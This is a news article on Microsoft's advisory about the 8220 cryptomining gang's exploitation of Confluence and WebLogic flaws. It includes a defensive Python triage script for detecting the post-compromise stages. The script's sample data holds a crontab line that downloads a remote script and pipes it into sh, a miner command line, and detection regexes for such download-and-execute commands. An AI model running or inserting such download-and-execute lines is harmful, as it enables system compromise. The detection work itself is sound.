Microsoft has released a threat advisory about a mining gang known as 8220 that targets the Linux operating system. This newly discovered threat group has been seen installing crypto-mining malware.
According to the researchers, the adversary was spotted running an updated malware campaign that included a new strain of IRC bot and a cryptominer.
Microsoft has detailed the 8220 gang's latest campaigns, in which the group was found abusing a critical vulnerability that affects Atlassian Confluence Server and Data Center.
The cybersecurity researchers stated that the new campaign targets x86_64 and i686 Linux systems. For initial access, the threat operators use RCE exploits for CVE-2022-26134 (Atlassian Confluence Server and Data Center) and CVE-2019-2725 (Oracle WebLogic).
The 8220 mining group has been updating its strategies and payloads for quite some time.
Based on reports, the threat actors operating the 8220 group have been actively updating their tactics, techniques, procedures and payloads for a long period. One notable update to its malware is a new version of its cryptocurrency miner together with an IRC bot.
The threat group was also spotted targeting Windows systems through the Atlassian vulnerability, injecting a script into a PowerShell process in memory. After initial access, the backdoor downloads and installs a loader that alters the system's configuration.
The malicious loader then disables the security services on the infected device. Subsequently, the loader downloads a cryptominer, establishes persistence on the network, and scans ports to locate other servers.
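The post-compromise chain described above (security services disabled, a loader that persists and fetches a miner, then port scanning for further servers) maps to a handful of host-side checks a defender can run. The script below is an added example written for this article; it is not code from Microsoft's advisory or from the 8220 gang's toolset, and every service name, process name, address and port in its sample data is a constructed assumption rather than an indicator taken from the report. It encodes each stage as a simple heuristic over constructed samples of service state, crontab entries, a process list and an outbound connection log.

```python
"""
Added example (not from the article or Microsoft's advisory): host triage
heuristics for the post-exploitation stages the article describes.
All sample data is constructed; names, addresses and ports are assumptions.
"""
import re
from collections import defaultdict

# Assumption: generic Linux security services worth watching for tampering.
WATCHED_SERVICES = ("firewalld", "apparmor", "auditd")

# Crontab line that pipes a downloaded payload straight into a shell.
DOWNLOAD_EXEC_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")
# Command-line fragments commonly seen with mining software (assumption).
MINER_HINT_RE = re.compile(r"stratum\+tcp://|xmrig|minerd", re.IGNORECASE)

# Constructed sample: unit states in the style of `systemctl is-enabled`.
SAMPLE_SERVICE_STATE = {"firewalld": "disabled", "apparmor": "enabled", "auditd": "masked"}

# Constructed sample crontab (203.0.113.0/24 is an RFC 5737 documentation range).
SAMPLE_CRONTAB = [
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "*/10 * * * * curl -fsSL http://203.0.113.10/example.sh | sh",
]

# Constructed sample process list: (pid, cpu_percent, cmdline).
SAMPLE_PROCESSES = [
    (812, 0.3, "/usr/sbin/sshd -D"),
    (2231, 97.5, "/tmp/.x/kthreaddi -o stratum+tcp://pool.example.invalid:3333 -u wallet"),
]

# Constructed sample outbound connections: (timestamp_s, src, dst, dport).
# One host touches six different neighbours on the same port within seconds;
# another repeats a normal HTTPS connection to a single server.
SAMPLE_CONNECTIONS = [(100 + i, "10.0.0.5", f"10.0.1.{i + 1}", 8080) for i in range(6)] + [
    (100, "10.0.0.7", "10.0.0.20", 443),
    (130, "10.0.0.7", "10.0.0.20", 443),
]


def disabled_security_services(state):
    """Return watched services whose unit state is anything other than 'enabled'."""
    return sorted(name for name in WATCHED_SERVICES if state.get(name) != "enabled")


def suspicious_cron_entries(lines):
    """Flag crontab lines that download a payload and pipe it into a shell."""
    return [line for line in lines if DOWNLOAD_EXEC_RE.search(line)]


def miner_like_processes(procs, cpu_threshold=80.0):
    """Flag CPU-bound processes that look like a miner or run from a scratch directory."""
    hits = []
    for pid, cpu, cmd in procs:
        from_scratch = cmd.startswith(("/tmp/", "/dev/shm/", "/var/tmp/"))
        if cpu >= cpu_threshold and (MINER_HINT_RE.search(cmd) or from_scratch):
            hits.append(pid)
    return hits


def scanning_sources(conns, window_s=60, min_distinct_hosts=5):
    """Return (src, dport) pairs that reached many distinct hosts on one port inside a window."""
    by_key = defaultdict(list)
    for ts, src, dst, dport in conns:
        by_key[(src, dport)].append((ts, dst))
    flagged = []
    for key, events in by_key.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            hosts = {dst for ts, dst in events[i:] if ts - t0 <= window_s}
            if len(hosts) >= min_distinct_hosts:
                flagged.append(key)
                break
    return sorted(flagged)


def triage(state, crontab, procs, conns):
    """Run every stage check and collect the findings keyed by stage."""
    return {
        "disabled_services": disabled_security_services(state),
        "cron_download_exec": suspicious_cron_entries(crontab),
        "miner_pids": miner_like_processes(procs),
        "scanning_sources": scanning_sources(conns),
    }


if __name__ == "__main__":
    findings = triage(SAMPLE_SERVICE_STATE, SAMPLE_CRONTAB, SAMPLE_PROCESSES, SAMPLE_CONNECTIONS)
    for stage, result in findings.items():
        print(f"{stage}: {result}")
```

In practice the sample structures would be filled from the real host (unit states from systemctl, crontabs from /etc/cron* and per-user tables, the process table and a flow or firewall log), and each heuristic is deliberately generic: it keys on the behaviour the article describes rather than on any file name or address, so it stays useful as the group swaps payloads.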
Separate research has also observed the group targeting Docker images and a critical Apache Struts2 flaw to infect enterprise servers. Researchers are still working out the full extent of this threat group's new features and capabilities, which make its operations harder to track.
Malicious threat actors are known to abuse numerous security vulnerabilities for profit and for further attacks. Cybersecurity experts recommend that organisations follow a proper patch management program to stay up to date and mitigate potential attacks.